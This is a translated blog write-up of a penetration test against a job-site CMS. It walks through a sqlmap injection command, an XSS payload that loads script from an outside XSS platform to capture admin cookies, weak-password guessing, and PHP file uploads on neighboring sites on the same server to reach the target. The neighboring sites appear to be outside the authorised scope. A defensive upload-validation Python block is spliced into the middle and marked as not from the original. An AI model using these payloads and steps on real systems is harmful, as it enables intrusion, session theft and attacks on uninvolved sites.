Author: Liuker. Original: http://www.anying.org/thread-88-1-1.html. Please credit the source when reprinting.
0x1 Preface: I really did not know what to write. The current web penetration methods are all much the same, so I wrote up a recent project.
0x2
Because the XX talent network had been hacked, they asked our company for a penetration test. It had already been hacked several times, and the penetration was difficult.
0x3
Necessary information collection
IP: XXX. XX. XX. X
Port: 80
Script: php
The environment is Linux + IIS 9.0. What kind of strange Linux + IIS combination is this? It is actually very simple: the so-called IIS 9.0 is just a modified Apache.
The program is CWEBS, a paid program suite.
The target site has user registration and file upload.
0x4
Scan
Scanning http://www.xxxx.com/info.php with a tool.
This yields sensitive information, such as the absolute path of the website; only the information used in this article is extracted here.
/home/web0906p1/htdocs/info.php
The admin backend address is http://www.xxxx.com/admin
An injection point was discovered:
http://www.xxxx.com/?Ctl=Query&act=File&typeid=455
An FCK editor exists:
http://www.xxxx.com/plus/FCKedit...nnectors/test.html#
58 neighboring sites on the same server also run Cwebs.
0x6
Detect and exploit existing vulnerabilities
The upload directory is revealed during the upload process. The user name is used as the upload directory name.
/Upfiles/Person//111.asp/40fe81afefd207b403e3c5acd3a0984c.jpg
Not IIS 6.0, so this is fruitless.
Fuzzing with Burp Suite payloads shows that PHP extensions are filtered out; JSP cannot be executed.
The FCK editor has been changed to a whitelist.
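The blacklist-versus-whitelist point above (PHP extensions filtered but other extensions tried, and a user name used verbatim as the upload directory) is the defender's lesson in this section. As an added example that is not part of the original post or of CWEBS, the following Python shows the validation an upload handler should perform: a whitelist of extensions, rejection of path separators, null bytes and double extensions, a user name that becomes a directory only after it is reduced to a safe token, and a random stored file name. All names here (ALLOWED_EXTENSIONS, safe_extension, upload_target) are hypothetical.

```python
import os
import re
import secrets

# Extensions the application is willing to store; everything else is refused (whitelist).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
# A user name is used as a directory name only if it is reduced to this safe token form.
SAFE_DIR_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def safe_extension(filename: str):
    """Return the lower-cased extension if the name is acceptable, else None.

    Path components, null bytes and multiple extensions are rejected, so names such
    as 'shell.php', 'a.php.jpg' or 'x.asp/y.jpg' never reach the filesystem.
    """
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return None
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1].lower()
    return ext if ext in ALLOWED_EXTENSIONS else None


def upload_target(base_dir: str, username: str, filename: str):
    """Compute where an upload is stored, or None if it must be refused.

    The client controls neither the directory (the user name must match SAFE_DIR_RE,
    so a name like '111.asp' is rejected) nor the stored file name (random token).
    """
    ext = safe_extension(filename)
    if ext is None:
        return None
    user_dir = username.lower()
    if not SAFE_DIR_RE.match(user_dir):
        return None
    stored = f"{secrets.token_hex(16)}.{ext}"
    path = os.path.normpath(os.path.join(base_dir, user_dir, stored))
    # Defence in depth: the final path must still lie inside base_dir.
    if not path.startswith(os.path.normpath(base_dir) + os.sep):
        return None
    return path
```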
The injection vulnerability is exploited as follows:
python "C:\Tools\sqlmapgui\sqlmap.py" -v 1 --beep --eta --batch -u "http://www.xxxx.com/?Ctl=Query&act=File&typeid=455" --level=3 --risk=2 --data="XM=1111&SFZ=1" --cookie="PHPSESSID=10f9b3c61c2cd1_a6fd28a42442221" --dbms=mysql --technique BEUST --union-cols=1-10 --time-sec=5 --banner --current-user --current-db --is-dba --users --dbs
Figure 1
Then the injection always returns 403.
Apparently there is an NFS firewall.
Then an online consultation form can be seen on the main site.
Figure 2
Then we found that XSS exists.
Insert the following code in the title:
<script src="http://xssing.me/api1694"></script>
Figure 3
Then wait for the cookies.
0x6
Cwebs
It took three hours to go through the sites.
www.1111.com
Any file can be uploaded through the website feedback form on this neighboring site.
Figure 4
Upload the PHP file to obtain the address.
http://1111.com/tell/web_idea.ph...540e581f720a2a0.php
Painful.
The file is served as a direct download, but we can determine that 00f3cf0b74840a2b3540e581f720a2a0.php is the file name.
Then find the paths of some files on the website.
Painful.
However, the admin area is also a pain.
Try weak password combinations using Burp Suite.
Directly 1111 / 1111 (1111 stands for the domain name).
However, getting into the backend is also painful.
Simple background
The backend management does not support Opera.
No IE 6.0.
Only inspecting elements is possible.
http://1111.com//admin/news/news_mng.php
News Management Interface
Click to modify a news article
Figure 7
Since any script can be uploaded from the frontend, it is clear that the backend allows uploads as well.
Upload a PHP file and view the source code.
http://1111.com/images/gist/20130305145927%0%.php
Figure 8
Then combine this with the path of the target site.
/home/web0906p1/htdocs/info.php
Try cross-site access.
Success
Figure 9
Then the cookies are received on the XSS platform.
Figure 10
Then log in to the backend.
Figure 11
At this point I am exhausted.